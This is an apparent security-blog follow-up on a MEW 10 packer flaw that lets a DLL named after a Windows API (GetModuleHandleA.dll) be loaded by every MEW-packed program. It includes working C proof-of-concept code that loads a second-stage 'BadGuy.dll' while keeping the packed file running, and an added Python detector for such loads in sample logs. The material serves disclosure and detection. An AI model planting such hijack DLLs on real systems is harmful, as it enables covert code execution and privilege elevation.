09.14
This is a follow-up on the MEW file format analysis. As mentioned in our video blog yesterday, we noticed that MEW 10 has a design flaw: it wrongfully passes function names to LoadLibraryA, which first tries to load the name as a DLL file, and once that has failed it passes the same string to GetProcAddress and successfully finds the selected function in the previously loaded DLL. We can exploit this by creating a dummy DLL file named after a function which every file on Windows imports, for example ExitProcess or GetModuleHandleA. Placing such a file in %Windows%\System32 would ensure that this file is loaded each time a MEW 10 packed file is executed on the system. But we have a problem we must resolve before we proceed. As said earlier, the function only gets found if the DLL isn't loaded, or more specifically if the call to LoadLibraryA returns NULL. This must be resolved because we don't want to crash the packed file. So to work around this we simply do this inside our GetModuleHandleA.dll file:
#include <windows.h>

BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)
{
    switch (ul_reason_for_call) {
    case DLL_PROCESS_ATTACH:
        /* Load the second stage only once, then refuse to stay loaded so that
           LoadLibraryA("GetModuleHandleA") returns NULL and the stub falls
           through to GetProcAddress as it normally would. */
        if (GetModuleHandleA("BadGuy.dll") == NULL) {
            LoadLibraryA("BadGuy.dll");
            return FALSE;
        }
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}
Returning FALSE at DLL_PROCESS_ATTACH makes Windows unload our GetModuleHandleA.dll, but not before BadGuy.dll gets loaded. The simple code above ensures that our BadGuy.dll gets loaded only once (Windows also prevents this, so this isn't really needed) since a MEW 10 packed file can import GetModuleHandleA multiple times. Our BadGuy.dll only creates a new thread which displays a message box about it being successfully loaded. This could have been done with a single DLL file, but we wanted to keep it short and simple.
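From the defender's side, the observable artifact of this flaw is a process loading a DLL whose file name is a Win32 API name (GetModuleHandleA.dll, ExitProcess.dll), typically followed by an unsigned second stage. The following added example, not part of the original post, runs that check over a few constructed Sysmon-style image-load records; the record format, process paths and API list are assumptions for illustration.

```python
import re

# Constructed Sysmon-like image-load records (Event ID 7); not real telemetry.
SAMPLE_IMAGE_LOADS = [
    r"Image=C:\Games\packed.exe ImageLoaded=C:\Windows\System32\kernel32.dll Signed=true",
    r"Image=C:\Games\packed.exe ImageLoaded=C:\Windows\System32\GetModuleHandleA.dll Signed=false",
    r"Image=C:\Games\packed.exe ImageLoaded=C:\Windows\System32\BadGuy.dll Signed=false",
    r"Image=C:\Windows\explorer.exe ImageLoaded=C:\Windows\System32\user32.dll Signed=true",
]

# kernel32 exports a packer stub commonly resolves by name (assumed short list);
# a DLL file named exactly like one of these is the hijack marker described above.
API_NAMES = {"ExitProcess", "GetModuleHandleA", "GetProcAddress", "LoadLibraryA", "VirtualAlloc"}

_REC = re.compile(r"Image=(?P<image>\S+)\s+ImageLoaded=(?P<loaded>\S+)\s+Signed=(?P<signed>\w+)")


def parse_record(line):
    """Split one record into process image, loaded DLL path, signed flag and DLL basename."""
    m = _REC.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["basename"] = rec["loaded"].rsplit("\\", 1)[-1]
    rec["signed"] = rec["signed"].lower() == "true"
    return rec


def flag_api_named_loads(lines, api_names=API_NAMES):
    """Return one finding per load of a DLL named after an API, plus the unsigned
    DLLs the same process loaded afterwards (the second stage, BadGuy.dll here).
    Matching is case-insensitive because NTFS file names are."""
    wanted = {n.lower() for n in api_names}
    records = [r for r in (parse_record(l) for l in lines) if r]
    findings = []
    for i, rec in enumerate(records):
        stem, _, ext = rec["basename"].rpartition(".")
        if ext.lower() != "dll" or stem.lower() not in wanted:
            continue
        followups = [r["loaded"] for r in records[i + 1:]
                     if r["image"] == rec["image"] and not r["signed"]]
        findings.append({"process": rec["image"], "hijack_dll": rec["loaded"],
                         "followup_unsigned": followups})
    return findings


if __name__ == "__main__":
    for f in flag_api_named_loads(SAMPLE_IMAGE_LOADS):
        print(f)
```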
There are many examples of design flaws in PE shell modifiers which could seriously threaten system security. Such examples are not limited to arbitrary code execution but could also lead to privilege elevation. We will continue to write about such shell modifier flaws in the future.